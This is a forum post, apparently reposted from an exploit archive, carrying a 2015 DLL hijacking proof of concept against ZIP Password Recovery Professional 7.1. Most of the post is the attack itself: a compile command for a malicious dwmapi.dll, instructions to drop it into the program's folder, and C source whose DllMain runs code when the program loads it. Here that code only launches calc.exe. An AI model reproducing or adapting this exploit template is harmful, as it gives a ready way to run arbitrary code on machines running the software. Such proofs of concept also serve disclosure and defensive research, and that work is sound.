Jump to content
KhiZaRix

ZIP Password Recovery Professional 7.1 DLL Hijacking

Recommended Posts

/*

#[+] Author: TUNISIAN CYBER

#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking

#[+] Date: 29-03-2015

#[+] Type: Local Exploits

#[+] Vendor: SmartKey ZIP Password Recovery – Recover ZIP, WinZip, PKZip Password

#[+] Tested on: WinXp/Windows 7 Pro

#[+] Friendly Sites: sec4ever.com

#[+] Twitter: @TCYB3R

#[+] gcc -shared -o dwmapi.dll tcyber.c

# Copy it to the software dir. then execute the software , calc.exe will launch :).

Proof of Concept (PoC):

=======================

*/

#include <windows.h>

int tunisian()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

tunisian();

return 0;

}

Source: http://dl.packetstormsecurity.net/1503-exploits/zipprp-dllhijack.txt

Edit: Cer ca postu meu s? fie ?ters , originally posted by aerosol: https://rstforums.com/forum/99634-zip-password-recovery-professional-7-1-dll-hijacking.rst

Edited by KhiZaRix
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...